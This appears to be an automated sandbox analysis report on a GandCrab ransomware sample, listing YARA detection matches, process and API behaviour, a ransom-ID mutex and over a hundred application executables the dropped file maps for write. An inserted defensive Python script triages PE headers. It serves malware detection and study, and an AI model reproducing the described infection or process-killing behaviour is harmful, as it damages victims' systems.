Source: 0.0.SY5DeZW6pz.exe.f390000.0.unpack, type: UNPACKEDPE | Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.0.SY5DeZW6pz.exe.3760000.2.raw.unpack, type: UNPACKEDPE | Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.0.SY5DeZW6pz.exe.3760000.2.raw.unpack, type: UNPACKEDPE | Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.0.SY5DeZW6pz.exe.3760000.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.0.SY5DeZW6pz.exe.3760000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.2.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE | Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.2.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE | Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.2.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.2.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE | Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 00000000.00000002.352730641.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY | Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 00000000.00000002.352730641.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY | Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 00000000.00000002.352730641.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000000.00000002.352730641.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY | Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 00000000.00000000.324233119.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY | Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 00000000.00000000.324233119.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY | Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 00000000.00000000.324233119.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000000.00000000.324233119.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY | Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5580 -s 532
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe | Code function: 0_2_0F391C20
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe | Code function: 0_2_0F391020
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe | Code function: 0_2_0F3A9B71
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe | Code function: 0_2_0F3983C0
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe | Code function: 1_2_00C26D00
Source: MyProg.exe.1.dr | Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
Source: SciTE.exe.1.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: SciTE.exe.1.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: SciTE.exe.1.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: SciTE.exe.1.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: SciTE.exe.1.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: SciTE.exe.1.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: SciTE.exe.1.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: SciTE.exe.1.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SciTE.exe.1.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SY5DeZW6pz.exe | Static PE information: Number of sections : 57 > 10
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\vSQshX.exe 4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
Source: vSQshX.exe.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: vSQshX.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: vSQshX.exe.0.dr | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                    Source: SY5DeZW6pz.exeVirustotal: Detection: 81%
                    Source: SY5DeZW6pz.exeMetadefender: Detection: 65%
                    Source: SY5DeZW6pz.exeReversingLabs: Detection: 95%
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknownProcess created: C:\Users\user\Desktop\SY5DeZW6pz.exe "C:\Users\user\Desktop\SY5DeZW6pz.exe"
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeProcess created: C:\Users\user\AppData\Local\Temp\vSQshX.exe C:\Users\user\AppData\Local\Temp\vSQshX.exe
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5580 -s 532
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 1432
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeProcess created: C:\Users\user\AppData\Local\Temp\vSQshX.exe C:\Users\user\AppData\Local\Temp\vSQshX.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeCode function: 1_2_00C2119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeFile created: C:\Users\user\AppData\Local\Temp\vSQshX.exeJump to behavior
                    Source: classification engineClassification label: mal100.rans.spre.troj.evad.winEXE@7/17@1/2
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeCode function: 0_2_0F397330 VirtualAlloc,VirtualAlloc,GetUserNameW,VirtualAlloc,GetComputerNameW,wsprintfW,VirtualAlloc,wsprintfW,VirtualAlloc,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,VirtualFree,VirtualAlloc,VirtualAlloc,wsprintfW,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,lstrcmpiW,wsprintfW,VirtualFree,VirtualAlloc,VirtualAlloc,wsprintfW,GetNativeSystemInfo,VirtualAlloc,wsprintfW,ExitProcess,wsprintfW,VirtualAlloc,VirtualAlloc,GetWindowsDirectoryW,GetVolumeInformationW,lstrlenW,wsprintfW,lstrcatW,lstrcatW,GetModuleHandleW,GetProcAddress,lstrlenW,VirtualFree,lstrcatW,VirtualAlloc,GetDriveTypeW,lstrcatW,lstrcatW,lstrcatW,GetDiskFreeSpaceW,lstrlenW,wsprintfW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,VirtualFree,
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeCode function: 0_2_0F3946F0 CreateToolhelp32Snapshot,VirtualAlloc,Process32FirstW,CloseHandle,lstrcmpiW,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,Process32NextW,VirtualFree,FindCloseChangeNotification,
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5580
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5540
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeMutant created: \Sessions\1\BaseNamedObjects\Global\pc_group=WORKGROUP&ransom_id=f816ca825b40424e
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeAutomated click: OK
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeAutomated click: OK
                    Source: SY5DeZW6pz.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH

                    Data Obfuscation

                    Source: Yara match | File source: SY5DeZW6pz.exe, type: SAMPLE
                    Source: Yara match | File source: 0.0.SY5DeZW6pz.exe.3760000.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.0.SY5DeZW6pz.exe.f390000.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.SY5DeZW6pz.exe.3760000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.0.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.SY5DeZW6pz.exe.3760000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.0.SY5DeZW6pz.exe.f390000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.0.SY5DeZW6pz.exe.3760000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000000.307798996.000000000F39A000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.353018126.000000000F39A000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000000.324788306.000000000F39A000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000000.317714677.000000000F39A000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.352730641.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000000.324233119.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: SY5DeZW6pz.exe PID: 5580, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exe | Code function: 0_2_0F3A8E7B push ebp; ret
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exe | Code function: 0_2_0F3A8E85 push 00000000h; ret
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe | Code function: 1_2_00C21638 push dword ptr [00C23084h]; ret
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe | Code function: 1_2_00C2600A push ebp; ret
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe | Code function: 1_2_00C26014 push 00C214E1h; ret
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe | Code function: 1_2_00C22D9B push ecx; ret
                    Source: SY5DeZW6pz.exe | Static PE information: section name: |Zu8
                    Source: SY5DeZW6pz.exe | Static PE information: section names: .dat_0 through .dat_49 (50 sections)
                    Source: vSQshX.exe.0.dr | Static PE information: section name: .aspack
                    Source: vSQshX.exe.0.dr | Static PE information: section name: .adata
                    Source: MyProg.exe.1.dr | Static PE information: section name: PELIB
                    Source: MyProg.exe.1.dr | Static PE information: section name: Y|uR
                    Source: SciTE.exe.1.dr | Static PE information: section name: ruO
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exe | Code function: 0_2_0F398150 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree
                    Source: initial sample | Static PE information: section where entry point is pointing to: |Zu8
                    Source: initial sample | Static PE information: section name: |Zu8 entropy: 6.934749160260163
                    Source: initial sample | Static PE information: section name: .text entropy: 7.81169422100848
                    Source: initial sample | Static PE information: section name: Y|uR entropy: 6.934889298048315
                    Source: initial sample | Static PE information: section name: ruO entropy: 6.934278783546333
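The static findings in this section (57 sections, a writable .text, the oddly named |Zu8 / .dat_N / .aspack / PELIB / Y|uR / ruO sections, per-section entropy, and an entry point outside .text) are all header-level checks that an analyst can re-run locally on the sample and on the two infected host binaries (MyProg.exe and SciTE.exe) without a full PE library. The script below is an added example, not code from the Joe Sandbox report or from the sample; it uses only the Python standard library, parses just the COFF/optional/section headers, and exercises the checks against a constructed stand-in PE assembled in memory (the real sample is not embedded). The 7.0 bits-per-byte entropy cut-off is an assumed threshold, chosen so that the 7.81-bit .text reported above would trip it while the 6.93-bit sections would not; the list of "common" section names is likewise an assumption, not taken from the report.

```python
"""Static PE triage: section count, section names, writable/executable .text,
per-section entropy and which section holds the entry point (stdlib only)."""
import math
import struct

# IMAGE_SCN_* characteristic bits (winnt.h)
SCN_CNT_CODE = 0x00000020
SCN_CNT_INITIALIZED_DATA = 0x00000040
SCN_MEM_EXECUTE = 0x20000000
SCN_MEM_READ = 0x40000000
SCN_MEM_WRITE = 0x80000000

# Assumed "normal toolchain" names; anything else is reported.
COMMON_SECTIONS = {".text", ".rdata", ".data", ".idata", ".edata", ".rsrc",
                   ".reloc", ".bss", ".tls", ".pdata", ".xdata", ".CRT"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for constant data, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes):
    """Return (AddressOfEntryPoint, [section dicts]) from a PE image as stored on disk."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", pe, coff + 2)[0]     # NumberOfSections
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]     # SizeOfOptionalHeader
    opt = coff + 20
    entry_rva = struct.unpack_from("<I", pe, opt + 16)[0]     # AddressOfEntryPoint
    table = opt + opt_size                                    # first IMAGE_SECTION_HEADER
    sections = []
    for i in range(nsections):
        off = table + 40 * i
        name = pe[off:off + 8].rstrip(b"\0").decode("latin-1")
        vsize, vaddr, rawsize, rawptr = struct.unpack_from("<IIII", pe, off + 8)
        chars = struct.unpack_from("<I", pe, off + 36)[0]
        sections.append({"name": name, "vaddr": vaddr, "vsize": vsize, "chars": chars,
                         "entropy": shannon_entropy(pe[rawptr:rawptr + rawsize])})
    return entry_rva, sections


def triage(pe: bytes, entropy_threshold: float = 7.0) -> list:
    """Apply the report's static heuristics and return human-readable findings."""
    entry_rva, sections = parse_sections(pe)
    findings = []
    if len(sections) > 10:
        findings.append(f"section count {len(sections)} > 10")
    for s in sections:
        name, chars = s["name"], s["chars"]
        if name not in COMMON_SECTIONS:
            findings.append(f"non-standard section name {name!r}")
        if name == ".text" and chars & SCN_MEM_WRITE:
            findings.append(".text is writable")
        if chars & SCN_MEM_WRITE and chars & SCN_MEM_EXECUTE:
            findings.append(f"section {name!r} is writable and executable")
        if s["entropy"] > entropy_threshold:
            findings.append(f"section {name!r} entropy {s['entropy']:.2f} above {entropy_threshold}")
        if s["vaddr"] <= entry_rva < s["vaddr"] + max(s["vsize"], 1) and name != ".text":
            findings.append(f"entry point in section {name!r}, not .text")
    return findings


def build_pe(sections, entry_rva: int) -> bytes:
    """Assemble a minimal PE32 image (headers plus raw section data; not loadable).
    sections: list of (name, virtual_address, characteristics, raw_bytes)."""
    opt_size = 224                                               # PE32 optional header
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)           # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    opt = struct.pack("<HBBIIII", 0x10B, 14, 0, 0, 0, 0, entry_rva).ljust(opt_size, b"\0")
    raw_ptr = 0x40 + 4 + 20 + opt_size + 40 * len(sections)      # data follows the table
    table, blobs = b"", b""
    for name, vaddr, chars, data in sections:
        table += struct.pack("<8sIIIIIIHHI", name.encode(), len(data), vaddr, len(data),
                             raw_ptr, 0, 0, 0, 0, chars)
        blobs += data
        raw_ptr += len(data)
    return dos + b"PE\0\0" + coff + opt + table + blobs


def build_sample() -> bytes:
    """Constructed stand-in (not the real sample) mimicking the report: an RWX high-entropy
    .text, the entry point inside an oddly named section, and a run of .dat_N sections."""
    high = bytes(range(256)) * 16                                # entropy exactly 8.0
    code = SCN_CNT_CODE | SCN_MEM_EXECUTE | SCN_MEM_READ
    data = SCN_CNT_INITIALIZED_DATA | SCN_MEM_READ
    secs = [(".text", 0x1000, code | SCN_MEM_WRITE, high),
            ("|Zu8", 0x2000, code, bytes(range(256)) * 4),
            (".rsrc", 0x3000, data, b"\0" * 512)]
    secs += [(f".dat_{i}", 0x4000 + 0x1000 * i, data, b"\0" * 64) for i in range(12)]
    return build_pe(secs, entry_rva=0x2010)


if __name__ == "__main__":
    for line in triage(build_sample()):
        print(line)
    # On a real file: triage(open("SY5DeZW6pz.exe", "rb").read())
```

Against the constructed image this reports the section count, the writable and executable .text, the two high-entropy sections, thirteen non-standard names and the entry point landing in |Zu8. Whole-section entropy is a coarse signal on its own (the 6.93-bit sections in the report sit under a 7.0 cut-off), so in practice the name and entry-point checks carry more weight than the entropy line; for the infected host binaries the tell is a new trailing section such as PELIB, Y|uR or ruO with the entry point moved into it.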

                    Persistence and Installation Behavior

                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe | System file mapped for write (108 executables):
                        C:\Program Files (x86)\google\Update\1.3.36.131\GoogleUpdateComRegisterShell64.exe
                        C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                        C:\Program Files (x86)\microsoft office\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.NetFX40.exe
                        C:\Program Files\Google\Chrome\Application\104.0.5112.81\chrome_pwa_launcher.exe
                        C:\Program Files (x86)\google\Update\1.3.36.131\GoogleUpdate.exe
                        C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe
                        C:\Program Files (x86)\microsoft office\Office16\lync.exe
                        C:\Program Files (x86)\microsoft office\Office16\misc.exe
                        C:\Program Files (x86)\microsoft office\Office16\DCF\filecompare.exe
                        C:\Program Files (x86)\microsoft office\Office16\lync99.exe
                        C:\Program Files (x86)\autoit3\AutoIt3Help.exe
                        C:\Program Files (x86)\java\jre1.8.0_211\bin\ssvagent.exe
                        C:\Program Files (x86)\microsoft office\Office16\UcMapi.exe
                        C:\Program Files (x86)\microsoft office\Office16\ONENOTE.EXE
                        C:\Program Files (x86)\microsoft office\Office16\PDFREFLOW.EXE
                        C:\Program Files (x86)\autoit3\Examples\Helpfile\Extras\MyProg.exe
                        C:\Program Files (x86)\microsoft office\Office16\WINWORD.EXE
                        C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroBroker.exe
                        C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                        C:\Program Files (x86)\microsoft office\Office16\MSOSREC.EXE
                        C:\Program Files (x86)\microsoft office\Office16\OUTLOOK.EXE
                        C:\Program Files (x86)\microsoft office\Office16\DCF\Common.DBConnection.exe
                        C:\Program Files (x86)\microsoft office\Office16\protocolhandler.exe
                        C:\Program Files (x86)\microsoft office\Office16\MSQRY32.EXE
                        C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\wow_helper.exe
                        C:\Program Files\Google\Chrome\Application\104.0.5112.81\notification_helper.exe
                        C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                        C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\arh.exe
                        C:\Program Files (x86)\microsoft office\Office16\SELFCERT.EXE
                        C:\Program Files (x86)\microsoft office\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.NetFX45.exe
                        C:\Program Files (x86)\microsoft office\Office16\WORDICON.EXE
                        C:\Program Files (x86)\microsoft office\Office16\MSPUB.EXE
                        C:\Program Files (x86)\google\Update\1.3.36.131\GoogleCrashHandler64.exe
                        C:\Program Files\Google\Chrome\Application\chrome.exe
                        C:\Program Files (x86)\java\jre1.8.0_211\bin\jabswitch.exe
                        C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
                        C:\Program Files (x86)\microsoft office\Office16\DCF\DATABASECOMPARE.EXE
                        C:\Program Files (x86)\google\Update\1.3.36.131\GoogleCrashHandler.exe
                        C:\Program Files (x86)\microsoft office\Office16\SETLANG.EXE
                        C:\Program Files (x86)\autoit3\Aut2Exe\Aut2exe_x64.exe
                        C:\Program Files (x86)\microsoft office\Office16\ACCICONS.EXE
                        C:\Program Files (x86)\microsoft office\Office16\FIRSTRUN.EXE
                        C:\Program Files (x86)\microsoft office\Office16\MSACCESS.EXE
                        C:\Program Files (x86)\microsoft office\Office16\POWERPNT.EXE
                        C:\Program Files (x86)\autoit3\Uninstall.exe
                        C:\Program Files (x86)\google\Update\1.3.36.131\GoogleUpdateCore.exe
                        C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe
                        C:\Program Files (x86)\microsoft office\Office16\DCF\Common.ShowHelp.exe
                        C:\Program Files (x86)\microsoft office\Office16\SCANPST.EXE
                        C:\Program Files (x86)\autoit3\Au3Check.exe
                        C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe
                        C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe
                        C:\Program Files (x86)\java\jre1.8.0_211\bin\jp2launcher.exe
                        C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
                        C:\Program Files (x86)\microsoft office\Office16\MSOHTMED.EXE
                        C:\Program Files (x86)\microsoft office\Office16\CLVIEW.EXE
                        C:\Program Files (x86)\microsoft office\Office16\NAMECONTROLSERVER.EXE
                        C:\Program Files (x86)\microsoft office\Office16\IEContentService.exe
                        C:\Program Files (x86)\java\jre1.8.0_211\bin\java.exe
                        C:\Program Files (x86)\microsoft office\Office16\CNFNOT32.EXE
                        C:\Program Files\Google\Chrome\Application\104.0.5112.81\Installer\chrmstp.exe
                        C:\Program Files\Microsoft Office\Office16\AppSharingHookController64.exe
                        C:\Program Files (x86)\microsoft office\Office16\excelcnv.exe
                        C:\Program Files (x86)\microsoft office\Office16\GROOVE.EXE
                        C:\Program Files (x86)\microsoft office\Office16\OcPubMgr.exe
                        C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe
                        C:\Program Files (x86)\java\jre1.8.0_211\bin\java-rmi.exe
                        C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe
                        C:\Program Files (x86)\google\Update\1.3.36.131\GoogleUpdateBroker.exe
                        C:\Program Files (x86)\java\jre1.8.0_211\bin\unpack200.exe
                        C:\Program Files (x86)\java\jre1.8.0_211\bin\javacpl.exe
                        C:\Program Files (x86)\microsoft office\Office16\ONENOTEM.EXE
                        C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroLayoutRecognizer\AcroLayoutRecognizer.exe
                        C:\Program Files (x86)\microsoft office\Office16\msoev.exe
                        C:\Program Files (x86)\microsoft office\Office16\MSOUC.EXE
                        C:\Program Files\Microsoft Office\Office16\MSOHTMED.EXE
                        C:\Program Files (x86)\autoit3\SciTE\SciTE.exe
                        C:\Program Files (x86)\microsoft office\Office16\GRAPH.EXE
                        C:\Program Files (x86)\microsoft office\Office16\EXCEL.EXE
                        C:\Program Files (x86)\microsoft office\Office16\PPTICO.EXE
                        C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\LogTransport2.exe
                        C:\Program Files (x86)\microsoft office\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.exe
                        C:\Program Files (x86)\microsoft office\Office16\lynchtmlconv.exe
                        C:\Program Files (x86)\java\jre1.8.0_211\bin\javaws.exe
                        C:\Program Files\Google\Chrome\Application\104.0.5112.81\elevation_service.exe
                        C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe
                        C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\Eula.exe
                        C:\Program Files (x86)\autoit3\Au3Info.exe
                        C:\Program Files (x86)\autoit3\AutoIt3_x64.exe
                        C:\Program Files (x86)\microsoft office\Office16\AppSharingHookController.exe
                        C:\Program Files (x86)\microsoft office\Office16\OSPPREARM.EXE
                        C:\Program Files (x86)\microsoft office\Office16\MSOSYNC.EXE
                        C:\Program Files (x86)\microsoft office\Office16\XLICONS.EXE
                        C:\Program Files (x86)\microsoft office\Office16\DCF\Common.DBConnection64.exe
                        C:\Program Files\Microsoft Office\Office16\msoia.exe
                        C:\Program Files (x86)\google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\104.0.5112.81\chrome_installer.exe
                        C:\Program Files (x86)\autoit3\Au3Info_x64.exe
                        C:\Program Files (x86)\microsoft office\Office16\Wordconv.exe
                        C:\Program Files (x86)\autoit3\Aut2Exe\Aut2exe.exe
                        C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
